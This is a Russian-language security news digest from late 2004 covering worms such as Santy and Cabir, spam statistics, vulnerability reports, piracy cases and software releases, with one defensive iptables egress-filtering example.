uinC NewsLetter #53, 2004


Приветствуем!

Новости из Security Мира

27/12/2004 11:39 CD с опечатками пальцев всех граждан России могут появиться на пиратских рынках
В недрах нашего правительства родилась очередная безумная идея о том, как впустую потратить государственные деньги. Речь идет о т.н. законе по созданию государственного регистра населения (ГРН). Регистр будет содержать информацию о дате и месте рождения и биометрические данные граждан (отпечатки пальцев и образ радужной оболочки глаза).
С инициативой создания ГРН выступило Министерство информационных технологий и связи РФ (Мининформсвязи). Ответственность за формирование ГРН возложена на Федеральное агентство по информационным технологиям (Росинформтехнологии). Польза от принятия такого закона для органов следствия весьма и весьма сомнительна - профессиональные преступники вряд ли еще не научились не оставлять опечатков, а вот получить доступ к персональным данным граждан криминальные структуры будут не против, так же как и всевозможные иностранные разведки.
Что касается затрат, то они колоссальны - ведь далеко не самым дешевым оборудованием придется оснастить каждый паспортный стол.
Источник: www.cnews.ru

27/12/2004 12:27 Полиция Японии расследует дело о крупном интернет-мошенничестве
В Японии зафиксирован первый случай фишинга, в результате которого была похищена крупная сумма денег, сообщает The Japan Times. Национальное полицейское агенсво не разглашает подробности случившегося, однако известно, что дело по факту интернет-мошенничества было заведено в прошлом месяце и там фигурирует сумма в сотни тысячи иен. На данный момент ведутся работы, целью которых является доказать наличие мошеннического веб-сайта, где жертвы фишеров оставляли номера своих кредитных карт, пароли и аутентификационные данные. Как только доказательства будут собраны, виновные будут призваны к ответу. Скорее всего, это не единственный случай фишинга на территории страны, но безусловно первый, которым занялась местная полиция и котороый получил такой резонанс в кругах общественности. Волна фишинга уже давно захлестнула США и Европу и уловки фишеров становятся все более изощренными. Теперь японские финансовые учреждения будут принимать повышенные меры безопасности и информировать своих клиентов о возможных уловках мошенников. Жителям же страны рекомендовано проявлять повышенную бдительность и не отвечать на подозрительные электронные письма.
"Компьюлента"

27/12/2004 13:09 Федеральный закон не помешал США стать лидером по спаму
42% спама, полученного пользователями в этом году, отправлено из США, сообщает сайт CNET News.com со ссылкой на исследование компании Sophos. Эти цифры говорят о том, что американское антиспамерское законодательство просто не работает, отмечают в Sophos. «Когда мы опубликовали первый подобный отчет в феврале, США объяснили ситуацию тем, что их антиспамерский федеральный закон существует всего 3 месяца», — рассказал один из авторов исследования. Республика Корея стоит на втором месте в списке стран-спамеров. Оттуда выходит 13,43% всего мирового спама. На третьем месте находится Китай (8,44%). Далее следуют Канада (5,71%), Бразилия (3,34%), Япония (2,57%) Франция (1,37%) и Испания (около 1,18%). 1,13% спама приходится на долю Великобритании, 1,03% — на долю Германии, 1% — на долю Тайваня и 0,89% на долю Мексики. «Федеральный антиспамерский закон существует почти год, а спамеры по-прежнему отправляют миллионы сообщений. Вполне очевидно, что закон сделал крайне мало, чтобы остановить поток спама», — подчеркивают исследователи.
Источник

27/12/2004 13:20 GPL-основу open source пора совершенствовать
Грядет модернизация General Public License, юридической основы, на которой зиждется большая часть проектов разработки free- и open-source программного обеспечения и которую так зло раскритиковал председатель правления Microsoft Билл Гейтс. Автор GPL Ричард Столлман работает над поправками, которые добавят лицензии определенности в отношении патентов на ПО; прояснят вопрос об использовании GPL-программ в некоторых сетевых средах и на строго контролируемом оборудовании; а также устранят преграды, которые сегодня мешают смешивать программное обеспечение, регламентируемое GPL и другими лицензиями. За 13 лет, прошедшие с момента появления существующей второй версии GPL, лицензия переместилась с периферии индустрии вычислительной техники к ее центру. Теперь программное обеспечение GPL широко применяется в компаниях Fortune 500 и внедрено в большинстве компьютерных фирм. Но этот успех вызвал потребность в некоторых изменениях. «GPL стала осью вращения многомиллиардной индустрии. Честно говоря, я не думаю, что она была на это рассчитана, — говорит Марк Радклифф, юрист из Gray Cary, досконально изучивший GPL и другие лицензии. Например, некоторым хотелось бы видеть уточнения, которые помогли бы уменьшить вероятность того, что использование ПО GPL может навлечь на пользователей обвинение в нарушении патентов. И GPL должна быть лучше приспособлена к отраслевым инициативам последнего времени, таким как создание развитых веб-сервисов в интернете и применение усиленных мер обеспечения безопасности. Обычно юридическими документами, регламентирующими использование программного обеспечения, интересуются только юристы. Но в случае GPL это не так. Эта лицензия представляет собой соглашение, которое убеждает в возможности кооперации в отрасли, где бал правит конкуренция. Наиболее наглядной иллюстрацией этого служит операционная система Linux, которая все больше угрожает таким гигантам, как Microsoft и Sun Microsystems.
ZDNet

27/12/2004 13:44 Распространитель червя Randex попадет за решетку, когда повзрослеет
Британский суд приговорил 16-летнего подростка к шести месяцам лишения свободы за создание интернет-червя Randex, который превращал зараженные компьютеры в машины для рассылки спама. Осужденный будет отбывать наказание после того, как достигнет совершеннолетия, сообщает сайт Vnunet.com. Арест юного британца стал результатом совместной операции Скотланд-Ярда, ФБР и канадской полиции. Сотрудники правоохранительных органов арестовали также двух американцев и канадца. «Юные члены этой группы были бы наказаны строже, если были бы старше на несколько лет», — прокомментировал ситуацию технологический консультант антивирусной компании Sophos Грэхем Клюли (Graham Cluley). Следствие по делу автора Randex началось после того, как в интернете были обнаружены сети зараженных компьютеров, предлагаемых на продажу спамерам и инициаторам DoS-атак. Все задержанные распространители Randex оказались несовершеннолетними.
Viruslist

27/12/2004 14:57 Вирусный "зал славы" 2004 от Panda Software
Антивирусная компания Panda Software опубликовала своеобразный хит-парад вирусов и троянов, которые в той или иной степени отличаются от остальных своих собратьев. 2004 год, пишет компания, был очень противоречивым годом относительно вирусной активности. В течение года были серьезные эпидемии, вызванные такими вирусами как Sasser или Mydoom. Мы также были свидетелями кибер-войн между группами вирусописателей, пытающихся распространить свои создания (например, Bagle и Netsky) по всему миру. Но были и моменты относительного затишья. Вирусы опубликованы в следующих номинациях:
Самый разрушительный - Sasser;
Самый сложный - Noomy.A;
Самый разговорчивый - Amus.A;
Самый музыкальный - некоторые варианты червя Netsky;
Самый скрытный - Bagle;
Вирус-полиглот - Zafi.D;
Самый неприличный - вирус Tasin.C;
Самый повторяющийся - cемейство сетевых червей Gaobot;
Самый шизофреничный - Bereb.C;
Самый вежливый - cразу три вируса - StartPage.AV, Harnig.B и Multidropper.AM.
Подробнее

27/12/2004 15:15 LCP: новая версия
Вышла новая версия программы LCP, предназначенной для аудита и восстановления паролей Windows NT/2000/XP/2003, и известной ранее под названием LC+4, сообщает bugtraq.ru. Изменения:
- добавлена поддержка дополнительного шифрования учетных записей пользователей активизированной программой SYSKEY при выполнении импорта из реестра и импорта файла SAM;
- добавлена возможность импорта файлов сеансов LC5;
- появилась английская версия программы.
Страница проекта

27/12/2004 15:38 "Мобильный" спам - ПК отдыхают
Проблема спама на мобильные телефоны в нашей стране еще не приняла таких угрожающих масштабов, какие наблюдаются, например, в Южной Корее. Однако, как известно, только хорошие вещи внедряются с трудом, а гадость всегда быстро находит себе дорогу. Так что рапорт, обнародованный на днях южнокорейским государственным аналитическим агентством по безопасности информации с ласковым именем KISA (Korea Information Security Agency), возможно, в некоторой степени отражает и наше будущее. Аналитики из KISA отмечают значительный рост нежелательных текстовых сообщений и телефонных звонков, при этом, динамика роста мобильного спама значительно превышает такие же показатели по получению нежелательных писем через электронную почту на настольных ПК. Как выяснилось, количество жалоб на получение нежелательных сообщений по телефону составило в Южной Корее за первые 10 месяцев года более 244 тысяч, в то время как жалобы на традиционный спам составили 78 тысяч случаев. Поскольку тенденция рассылки мобильного спама начала проявлять себя ощутимо лишь в нынешнем году, аналитики KISA ожидают значительного роста жалоб в будущем. Для сравнения, в 2002 году зарегистрировано всего 4864 случая жалоб на мобильный спам. Предполагается, что с мобильными спаммерами будут бороться на государственном уровне, однако, уже сейчас корейские операторы связи принимают меры самостоятельно. Так, с начала года второй по величине оператор страны Hanaro Telecom уже отключил 130 спаммеров из своей сети. Мобильный спам имеет две разновидности - SMS-сообщения и голосовые звонки автоматических систем - ARS (automatic response system). Интересно отметить, что в Южной Корее для внесения жалоб о спаммерах существует специальный сервисный номер - 114.
Mobile-review

27/12/2004 17:27 Беспроводные сети защитит краска
С распространением беспроводных сетей, известных своей уязвимостью, компании ИБ предлагают новые и всё более комплексные методики по их защите от взлома: пароли, шифрование, биометрическую аутентификацию. Блокирование радиоволн внутри офисного помещения или квартиры, являющееся более простой стратегией защиты, до последнего времени не получало достаточного распространения. Возможно, теперь это станет меняться. Продукт фирмы Force Field Wireless под названием DefendAir представляет собой латексную краску с примесью медных и аллюминиевых волокон, и при нанесении на твёрдую поверхность блокирует распространение радиосигнала. Краска, представленная в сером матовом цвете (вполне пригодном для основы), стоит $69 за галлон. Она эффективно защищает сети стандартов Wi-Fi, Wi-Max и Bluetooth, функционирующие на частотах от 100 МГц до 2.4 ГГц, от интерференции, внешнего прослушивания и активного вмешательства. Два-три слоя покрытия дают наилучшие результаты защиты для радиосигналов с частотой в пределах 5 ГГц. Помимо краски фирма предлагает схожего состава плёнку для окон по $39 за упаковку. Force Field Wireless рекомендует применять краску очень внимательно – радиоволны находят малейшие лазейки. Кроме того, следует обращать внимание, что покрытие может ухудшить приём телевизионного сигнала и затруднить работу мобильных телефонов.
PGP в России

27/12/2004 19:54 Один из способов борьбы с PHP-червем
Новая модификация червя Santy.C, которую уже успели переименовать в PhpIncludeWorm, помимо форума phpBB обладает способностью заражения и других приложений PHP. Николай Малых - администратор форума Forum.Protocols.ru при обсуждении возможных вариантов защиты от червя с одним из модераторов этого же форума Phoenix пришёл к следующему варианту защиты - в качестве противодействия попыткам атаки рекомендуется использовать фильтрацию попыток организовать исходящие соединения с Web-сервера на граничном фильтре или самом сервере. Детали фильтрации зависят от конкретного использования хоста на котором работает Web-сервер. В простейшем случае можно просто заблокировать исходящие соединения со всех (или части) IP-адресов данного хоста.
Например, для блокировки всех исходящих соединений из подсети, где размещаются Web-серверы, с помощью межсетевого экрана на базе iptables можно использовать строку:
-A FORWARD -s подсеть Web -p tcp -m tcp -i eth0 --tcp-flags SYN SYN,ACK -j OpenToOutside.
При этом правило OpenToOutside обеспечивает отбрасывание пакетов и запись информации в журнальный файл системы:
-A OpenToOutside -j LOG --log-prefix "IPTABLES-OpenToOutside: " --log-level 4
-A OpenToOutside -j DROP.
Forum.Protocols.ru

27/12/2004 22:15 Уязвимоть в snort
Всё той же французской группой K-Otik обнаружена уязвимость в популярной IDS (система обнаружения попыток вторжения) Snort версии до 2.3.0-RC1. Удаленный атакующий может вызвать отказ в обслуживании системы. Уязвимость обнаружена в файле 'src/decode.c'. Удаленный атакующий может послать специально сформированный пакет и вызвать отказ в обслуживании системы. Группой подготовлен демонстрационный эксплоит.
Подробности

28/12/2004 10:53 Ученые построили компьютерную сеть, которую невозможно взломать
Несколько научных центров в мире занимаются в настоящее время разработкой технологии, которая позволит создавать абсолютно защищенные компьютерные сети, которые хакеры не смогут взломать. Как пишет во вторник газета Financial Times, речь идет о квантовой криптографии, с помощью которой предполагается шифровать информацию, после чего несанцкионированная ее расшифровка будет невозможна. Накануне первый опытный образец защищенной квантовой сети был создан в британском Кембридже специалистами компании Toshiba Research Europe. Ее возможности были протестированы на мощностях крупной телекоммуникационной компании MCI, и тест дал положительные результаты. Квантовые компьютерные технологии основаны на передаче данных с помощью фотонов (частиц света), которые хранят биты информации, положительно или отрицательно поляризуясь. Квантовые вычисления производятся с огромной скоростью, и технология квантовой криптографии позволяет менять криптографические ключи несколько раз в секунду. Как известно, хакеру, чтобы получить доступ к зашифрованной информации, необходимо подобрать криптографический ключ. В зависимости от сложности технологии шифрования ключ можно подбирать от нескольких минут до нескольких лет, при этом обычно требуются значительные компьютерные мощности. Чтобы попытаться подобрать все ключи к информации, зашифрованной квантовой криптографией, необходимы сроки, не совместимые с жизнью человека.
Подробности

28/12/2004 11:06 America Online вынуждает спамеров искать других адресатов
Крупнейший мировой интернет-провайдер America Online (AOL) полагает, что нашел способ защиты своих клиентов от спама. В этом году они получили меньше рекламных писем по сравнению с прошлым, поясняет выводы провайдера агентство Associated Press. В ноябре этого года клиенты AOL ежедневно получали 1,6 миллиарда электронных писем. В ноябре прошлого года на адреса клиентов AOL каждый день приходило 2,1 миллиарда писем. Сокращение почтового потока произошло главным образом за счет спама, убеждены в America Online. Спамеры отказываются от отправки писем, осознавая, что их послания не проходят через почтовые фильтры AOL. Кроме того, спамеры опасаются судебных преследований за свою деятельность. Таково мнение руководства America Online, которое выразил пресс-секретарь компании Николас Грэхем. Число пользователей почтовых услуг AOL к сентябрю этого года сократилось до 22,7 миллиона человек по сравнению с 24,7 миллиона человек в сентябре прошлого года. Провайдер все-таки сумел остановить отток клиентов и зафиксировал снижение числа жалоб на спамеров на 75%. Специалисты America Online отметили не только уменьшение числа писем, задержанных общими почтовыми фильтрами компании, но и количество посланий, отсеянных фильтрами самих пользователей. Другие ведущие провайдеры электронных почтовых услуг — Yahoo!, EarthLink и Microsoft — не предоставили статистических данных о потоке спама в почте своих клиентов. По данным компании Postini, фильтрующей почту более чем 4 тысяч мелких провайдеров, спамеры предпочитают направлять свои послания клиентам небольших сетей.
VirusList

28/12/2004 11:32 Google-червь атакует AOL и Yahoo
Не успела Google побороть одного червя Santy, как начали распространяться его варианты, использующие не только эту, но и другие поисковые машины. Проблема Santy возникла неделю назад, когда веб-сайты электронных досок объявлений обнаружили, что их страницы стерты и заполнены текстом самого червя. Распространяется он, разыскивая при помощи Google веб-страницы, использующие уязвимые версии программного обеспечения PHP Bulletin Board (phpBB). Когда Google принял меры к тому, чтобы помешать червю искать дырявое ПО электронных досок объявлений через свою поисковую систему, начали появляться варианты Santy, использующие, кроме Google, поисковые машины AOL и Yahoo. «Perl.Santy.B — это червь, написанный в виде скрипта Perl, который пытается распространиться на веб-серверы, исполняющие ПО электронной доски объявлений phpBB 2.x версии 2.0.11 и ниже, предупреждает Symantec в своем бюллетене от 26 декабря. — Для поиска новых потенциальных целей заражения он применяет поисковую машину AOL или Yahoo». AOL, которая пользуется поисковой технологией Google, изучает проблему, но не может с полной определенностью сказать, предотвратит ли уже введенная Google блокировка злоупотребление поисковым сайтом AOL. У Yahoo, которая отказалась от технологии Google еще в феврале, комментарии получить не удалось. Появилось и несколько других вариантов Santy. Santy.c опять атакует Google. Сегодня «Лаборатория Касперского» переименовала Santy.d и Santy.e в Spyki.a и b., отмечая значительные отличия в структуре этих червей по сравнению с более ранними версиями Santy. Секьюрити-фирма уточнила также, что новые черви используют для распространения бразильский вариант Google.
Подробности

28/12/2004 12:16 Novell испытывает смесь SuSE Linux с NetWare
Novell приступила к широкому тестированию своего программного обеспечения Open Enterprise Server, в котором инструменты из проприетарного ПО NetWare сочетаются с операционной системой open source SuSE Linux. На прошлой неделе Novell опубликовала на своем веб-сайте общедоступную бета-серсию Open Enterprise Server. Окончательный продукт должен быть готов к февралю. Novell работает над комбинированной системой NetWare-Linux с момента приобретения SuSE Linux в ноябре 2003 года. Будущий продукт служит ядром стратегии компании, направленной на сочетание двух моделей разработки ПО — проприетарной и open source. Ввиду сужения круга пользователей NetWare Novell интенсивно занимается освоением Linux — которая пользуется более широкой поддержкой, чем NetWare, — чтобы представить заказчикам долгосрочный план развития продуктов, в том числе настольного ПО и инструментов разработки. Novell Open Enterprise Server позволит существующим заказчикам Novell эксплуатировать смешанную сеть из серверов NetWare и SuSE Linux и использовать общие инструменты управления. В один из компонентов системы, называемый Novell Nterprise Linux Services 1.0, Novell включила переписанные для SuSE Linux традиционные функции NetWare, такие как управление файлам и принтерами. В пакет входит ядро операционной системы NetWare и SuSE Linux Server 9 Enterprise Edition, основанный на ядре Linux 2.6. Кроме того, в него входит так называемое ПО высокой готовности, предотвращающее отказы сервера, а также рабочие инструменты для конечных пользователей iFolder и Virtual Office.
ZDNet

28/12/2004 13:18 Вышла бета-версия Opera 8
На минувшей неделе норвежская компания Opera Software выпустила очередную бета-версию своего браузера. Напомним, что текущая стабильная версия Opera имеет номер 7.54, а новый, находившийся на стадии тестирования вариант имел номер 7.6. Однако с течением времени в браузер было добавлено так много новых функций, что разработчики решили, что новой версии вполне можно присвоить номер 8.0. Соответствующая бета-версия "самого быстрого на Земле браузера" и была выпущена накануне наступления в Норвегии рождественских праздников. Описание всех появившихся в браузере нововведений можно найти на сайте Opera. Из самых заметных стоит отметить оптимизацию представления веб-страниц под размер окна - опция Fit to window width позволяет избавиться от горизонтальной полосы прокрутки, а Fit to page width оптимизирует страницу для печати. Упростилась работа с RSS-каналами - теперь для доступа к ним не нужно активировать почтовый клиент, а при работе с сайтами, поддерживающими экспорт в формате RSS в адресной строке появляется кнопочка, позволяющая добавить канал во встроенный агрегатор. Значительно упростилась система меню, а закрытые страницы и заблокированные всплывающие окна теперь складываются в корзину, расположенную слева от вкладок, на которых расположены веб-страницы. Доступ к закладкам и дополнительным панелям поиска теперь можно получить через панель инструментов, выпадающую из адресной строки при создании нового окна. На каждой вкладке появилось по кнопке закрытия. Не менее важным пунктом стало и улучшение поддержки стандартов DHTML и CSS, с которыми у Opera традиционно возникают проблемы. В новой версии Opera поддерживается инструмент XMLHttpRequest и наконец-то стало возможным работать с почтовой службой Gmail. Выпуск окончательной версии Opera 8 намечен на начало 2005 года.
"Компьюлента"

28/12/2004 16:05 Китайцы запустили интернет нового поколения
Сеть CERNET2 (China Education and Research Network 2), объединяющая 25 университетов в 20 городах КНР, обладает пропускной способностью 2,5-10 гигабит в секунду и работает по протоколу IPv6. Сообщение о запуске CERNET2 было сделано в субботу 25 декабря – в день десятилетней годовщины открытия первой "академической" сети CERNET, работавшей по уже устаревшему протоколу IPv4. Стоимость сети, построенной с целью сокращения технологического отставания Поднебесной от западных и восточных конкурентов, составила порядка восьмидесяти миллионов долларов. Примерно такая же сумма, как пишет ITworld.com, была выделена пяти ведущим интернет-провайдерам Китая на обновление их инфраструктуры с целью поддержки шестой версии интернет-протокола.
Internet.Ru

28/12/2004 16:32 США вынесет приговор пирату
В Америке начато первое судебное разбирательство в рамках правительственной программы Operation Fastlink, призванной остановить пиратов, распространяющих нелегальные копии программного обеспечения. Как передает The Register, 26-летний Джатан Дезир (Jathan Desir) был обвинен в распространении нелегального ПО на сумму 200 тыс долл. По результатам обыска, который произошел в прошлом году, в квартире Джатана было обнаружено 13 000 наименований софта. Однако господин Дезир отказывается признавать свою вину. Стоит отметить, что, согласно законодательству США, ему грозит заключение сроком до 15 лет. Предполагается, что приговор будет вынесен в марте следующего года.
Вебпланета

28/12/2004 16:44 Троян, использующий уязвимость Internet Explorer
Как и следовало ожидать, появился троян, использующий уязвимость в Intenet Explorer в системе Windows Help. Уязвимоть присутствует, напомним, в IE 6.0 в ОС Windows XP SP2. Название трояну дано в соответствии с уязвимотью - Exploit-HelpZonePass (другие названия - Exploit/HHelp, HHelp). О появлении трояна сообщили специалисты Panda Software. Троян написан на JavaScript и имеет размер 1400 байт.
Описание трояна

28/12/2004 17:32 GPS(США) и ГЛОНАСС(Россия): какова допустимая точность позиционирования для гражданских?
Примерно через год будет снят ряд существующих ограничений по получению навигационной спутниковой информации для гражданских пользователей. Об этом заявил руководитель проектного отдела НПО имени Решетнева, где производятся спутники системы "ГЛОНАСС", Виктор Косенко. "Сейчас готовится постановление правительства, где существующие ограничения предполагается скорректировать", - сказал он. По словам Косенко, на сегодняшний день в России существует закон, по которому данные навигационных определений четче 30 метров для гражданских пользователей являются закрытыми. Сейчас совместно с Минобороны РФ обсуждается возможность снятия этих ограничений. Переговоры по степени точности получаемых данных с американской навигационной системы GPS и российской системы "ГЛОНАСС" близятся к завершению. В начале декабря Россия и США уже подписали совместное заявление, в котором говорится о намерении сторон сотрудничать в области навигационных спутниковых систем GPS и "ГЛОНАСС". Обе стороны подтвердили, что намерены предоставлять гражданскую часть сигнала американской системы GPS и российской "ГЛОНАСС" для использования в коммерческих, научных и спасательных целях на непрерывной глобальной и бесплатной основе, сообщает РИА "Новости".
РИА "Новости"

29/12/2004 12:13 Системного администратора осудили за незаконное устранение неполадок в работе 1С
На 1 год и 6 месяцев условно осудили инженера АСУ сети аптек г.Омска за установку программы Sable (широко известной в узких кругах) с целью исправления неполадок в работе законно купленной программы 1С. Кроме того, администратор выплатит штраф 5000 р. государству и 217 500 (двести семнадцать тысяч пятьсот) рублей в пользу ЗАО "I С". Несмотря на то, что приговор был оглашен давно, 19 июля 2004 г, мы посчитали, что читателям будет полезно ознакомиться с этой неприятной для сисадминов историей.
Приговор суда: www.appp.ru

29/12/2004 12:24 Santy спровоцировал эпидемию форумных вирусов, распространяющихся через поисковики
Идею распространения через поисковые системы, популяризованную на прошлой неделе вирусом Santy, подхватили другие вирусописатели. Как сообщает CNET News, специалисты по вирусной защите фиксируют появление новых модификаций Santy, которые ищут уязвимые сайты с помощью Google и других поисковых систем. Как сообщалось, червь Santy поражал сайты, на которых установлен популярный механизм для создания форумов phpBB. Недавно в phpBB была найдена критичная уязвимость, которая позволяла авторам вирусов атаковать сайт с работающим форумом и получать над ним контроль. Производители phpBB выпустили "заплатку", устраняющую уязвимость и сообщили об этом в СМИ, однако многие хозяева сайтов оставили сообщения без внимания. В результате, когда появился вирус и стал искать сайты-жертвы через Google, многие форумы, в том числе довольно популярные, оказались уничтожены. Администрация Google блокировала действия вируса, и его распространение прекратилось. Однако теперь появляются новые вирусы с аналогичным механизмом, и они пытаются использовать не только Google, но и другие поисковики. В компаниях AOL и Yahoo заявляют, что изучают проблему и по итогам примут адекватные меры.
Lenta.Ru

29/12/2004 12:51 В Москве прошла конференция по проблеме электронных СМИ и киберпреступности
24 декабря Федеральное агентство по печати и массовым коммуникациям совместно с ГУП города Москвы "Центр информационно-аналитических технологий" провели в Москве конференцию по проблеме присоединения к европейской конвенции по киберпреступности "Защита общества от противоправного использования электронных СМИ, наносящего ущерб государству, обществу и личности". По итогам конференции был принят проект рекомендаций, направленных на защиту от противоправного использования электронных СМИ. Участники конференции предлагают, в частности, осуществить "инвентаризацию" вероятных рисков, возникающих в связи с киберпреступностью, разработать методики организации противодействия киберпреступности, разработать меры по предотвращению компьютерных террористических атак в связи с несовершенством и изношенностью оборудования, определить перечень "критических инфраструктур" и разработать предложения по обеспечению их защиты от киберпреступности и др. В конференции приняли участие представители Министерства промышленности и науки РФ, МВД РФ, Федерального агентства по печати и массовым коммуникациям, аппарата Совета безопасности РФ, ФСБ РФ, правительства Москвы, Академии Генштаба МО, административных округов Москвы, Международного института корпоративной безопасности, ОАО "Электронная Москва", группы компаний "РНТ", корпорации IBM.
Подробности

29/12/2004 13:32 Лукашенко усиливает инквизицию в интернете
В Белоруссии для контроля глобальной Сети на местном уровне сложилась (или специально создана) весьма выгодная ситуация: весь интернет-трафик контролируется единственным провайдером-монополистом - «Белтелекомом», в то же время, появление любых материалов нежелательного для властей содержани, вызывает не только закрытие ресурса, но и привлечение, вплоть до уголовной ответственности, как авторов, так и тех, кто эти материалы разместил. На государственном уровне рассматриваются законопроекты, регламентирующие распространение массовой информации в интернете, а журнал Parade объявил Лукашенко одним из главных 10 врагов интернета, наряду с Ким Чен Иром и Саддамом Хусейном. Статья Артёма Борового на сайте CNEWS описывает видениее автора статьи на проблемы с Интернетом в Белоруссии.
Cтатья

29/12/2004 13:49 Проект WiFi.CNews.ru
Довольно любопытныя проект открыт в рамках проекта CNEWS. На сайте WiFi.CNews.ru публикуется каталог публичных точек беспроводного доступа в России и СНГ. На настоящий момент в базе имеется 24з хот-спота. Из стран СПГ упоминаются: Киев, Баку, Кишинёв, Алматы, Одесса. Особенно радует наличие в списке населённого пункта с названием "деревня Ангелово", что впрочем, объясняется тем, что в ней расположен санаторий "Росинка" (это Красногорский район Подмосковья).
Сайт проекта

29/12/2004 14:09 Открытая биллинговая система для домашних сетей
К Новому Году вышел релиз-кандидат открытой системы для учета и контроля трафика в домашних и офbсных сетях Stargazer, сообщает linux.org.ru. Система позволяет производить авторизацию пользователя, вести подсчет трафика по 10 заданным классам трафика. Ведется детальная статистика по каждому посещенному IP-адресу. Гибкая настройка тарифных планов. Есть возможность создания администраторов с разными привилегиями.
Cайт проекта

29/12/2004 14:13 Cabir становится по-настоящему опасным
Антивирусная компания F-Secure, первой обнаружившая вирусы Cabir.H, Cabir.I и Cabir.J, утверждает, что изначально безвредная "концептуальная" разработка приобретает черты все более опасного "боевого" вируса. В новых вариантах Cabir'a устранена ошибка, существенно тормозившая распространение более ранних версий. Если оригинальный вариант вируса мог заражать не более одного телефона из расчета на одну перезагрузку носителя, то версии Cabir.H и Cabir.I поражают все устройства, до которых могут дотянуться (напомним, что размножение идет посредством протокола беспроводной связи Bluetooth). По мнению экспертов, столь стремительный рост числа новых штаммов вируса, а также значительное сходство их "ДНК" говорит о том, что исходники "концептуального" вируса, скорее всего, попали в широкие народные массы. Так что, уважаемые владельцы смартфонов на платформе Symbian, готовьтесь.
Internet.Ru

29/12/2004 14:36 Microsoft обиделась на китайских хакеров
Вчера представители компании Microsoft осудили действия китайской Xfocus Team, которая занимается исследованиями различных уязвимостей и обнародовала на днях примеры кода, который использует новые "дыры" в Microsoft Windows. По мнению представителей Microsoft, такие "безответственные" действия не в интересах потребителей. Реакция компании последовала спустя пять дней после публикации информации о новых уязвимостях. Сейчас в MS изучают уязвимости, обнаруженные ранее. Одна из них связана с функцией для загрузки изображений в формате .bmp, курсоров и иконок. Она может быть использована злоумышленниками при помощи браузеров и почтовых клиентов. Вторая уязвимость, которая была обнаружена в модуле winhlp32.exe, позволяет злоумышленникам использовать в своих целях специально подготовленные файлы-справки, а третья – файлы с анимированными курсорами (.ani). Компьютерам с установленным Service Pack 2 угрожают только файлы справки, специально подготовленные злоумышленниками. Наличие остальных двух "дыр" подтверждается для более ранних версий операционной системы: Windows NT, Windows 2000 и Windows XP (с Service Pack 1). "В Microsoft разочарованы тем, что Xfocus предприняла действия, которые поставили пользователей под угрозу, вместо того чтобы последовать общепринятой традиции сообщить производителям об уязвимостях в частном порядке", – заявила представитель компании. Microsoft не известно об активных атаках злоумышленников, которые бы использовали указанные уязвимости. Видно, господа из службы информации Microsoft не читают сообщения о вирусной активности - например, сообщение Panda Software о появлении трояна Exploit/HHelp, HHelp.
Securitylab.Ru

29/12/2004 19:26 Бэкдоры в продуктах eEye (IRIS и SecureIIS)
Как сообщает Ланс Кусто (Lance Custo), во время проверки программ, проводимой совместно со своей группой, в IRIS и SecureIIS были обнаружены очень хорошо спрятанные "черные ходы". Бэкдор в IRIS активируется специальным образом сформированным UDP-пакетом, в SecureIIS - HTTP-заголовком (примеры по ссылке). Бэкдоры отсутствуют в IRIS версии до 3.0 и SecureIIS 1.x. В случае, если у Вас осталось желание пользоваться этими программами, рекомендуется откатиться до использования более младших версий программ.
Источник

30/12/2004 09:11 Спамера из Нидерландов оштрафовали за четыре письма
Власти Нидерландов впервые наложили штрафные санкции на спамеров, сообщает Associated Press. По решению независимого надзорного органа в области почты и телекоммуникаций Opta, штрафы будут применены к одному физическому лицу и двум компаниям. Власти обвинили их в рассылке рекламных электронных писем и SMS. По словам представителей Opta, они подписали соглашение с частной французской контрольной компанией CNIL. Таким образом французские и голландские эксперты рассчитывают повысить эффективность борьбы со спамерами. Самому крупному штрафу (45 тысяч евро) подвергся человек, отправивший четыре спам-письма. Одно из посланий содержало рекламные материалы о книге Гитлера Mein Kampf. Спамер отправил его от имени одного из голландских борцов со спамом. Этот же человек отправлял послания с материалами о программном обеспечении, разработанном компанией Groenendaal Uitgeverij BV. В связи с этим компания была оштрафована на 25 тысяч евро. Штрафу в 20 тысяч евро подверглась компания Yellow Monday Institute, рассылавшая пользователям SMS, за которые они платили по 1,10 евро.
Lenta.Ru

30/12/2004 09:45 Троян Trojan-Spy.HTML.Fraud.gen
"Лаборатория Касперского" сообщает о появлении трояна, которому антивирусной компанией было дано имя Trojan-Spy.HTML.Fraud.gen. Также известен как: Phish-BankFraud.eml (McAfee), Trojan Horse (Symantec), TrojanSpy:HTML/UrlSpoof.E* (RAV), HTML_SWENFRAUD.A (Trend Micro), TR/URLSpoof.P (H+BEDV), HTML/URLspoof.B@expl (FRISK), VBS.Trojan.Inor.Z.Spoofer (SOFTWIN), HTML.Phishing.Bank-31 (ClamAV), Exploit/URLSpoof (Panda). Представляет собой программу-шпион из семейства троянских программ, использующих спуфинг-технологию. «Троянцы» реализованы в виде поддельных HTML-страниц. Рассылаются по электронной почте под видом важного сообщения от крупных коммерческих банков, интернет-магазинов, софтверных компаний и т.д. В письме содержится ссылка, в которой использована Frame Spoof уязвимость в Internet Explorer. Уязвимость Frame Spoof (MS04-004) присутствует в 5.x и 6.x версиях Microsoft Interner Explorer. Компанией Microsoft был опубликован специальный документ, в котором приведено описание данной уязвимости и даны рекомендации по распознаванию подобных ложных ссылок. Попадая на сайт, пользователи вводят свои учетные данные, после чего они пересылаются злоумышленникам, и те могут получить полный доступ к управлению конфиденциальной информацией пользователя.
"Лаборатория Касперского"

30/12/2004 10:03 Студент из США осужден за нелегальное распространение софта
Студент из Университета Айовы (США) стал первым правонарушителем, привлеченным к уголовной ответственности в рамках правительственной программы Operation Fastlink, сообщает News Factor. Программа проводится Федеральным бюро расследований США с апреля текущего года и направлена на выявление и арест пиратов, нелегально распространяющих компьютерные игры, фильмы и программное обеспечение. Двадцатишестилетний Джатан Дезир создал две онлайновые библиотеки с пиратскими программами и распространял нелегальную продукцию в интернете. Из-за действий пирата софтверная индустрия понесла убытки в размере около 200000 долларов США. Дезир признал себя виновным в нанесении ущерба и нарушении копирайта. Ему грозит тюремное заключение сроком до пятнадцати лет. Обвинительное заключение будет вынесено судом в марте 2005 года. Программа Operation Fastlink распространяется, помимо США, еще на несколько стран мира. Первые рейды проводились в США, Европе и Азии. ФБР расследует деятельность как крупных компаний, так и частных фирм. Поддержку федералам оказывают несколько агентств и организаций, включая британскую национальную организацию по борьбе с преступлениями в сфере высоких технологий National Hi-Tech Crime Unit и международную организацию Business Software Alliance, которая осуществляет контроль за соблюдением лицензий и авторских прав.
Подробности

30/12/2004 10:22 Novell представила первую публичную бета-версию Open Enterprise Server
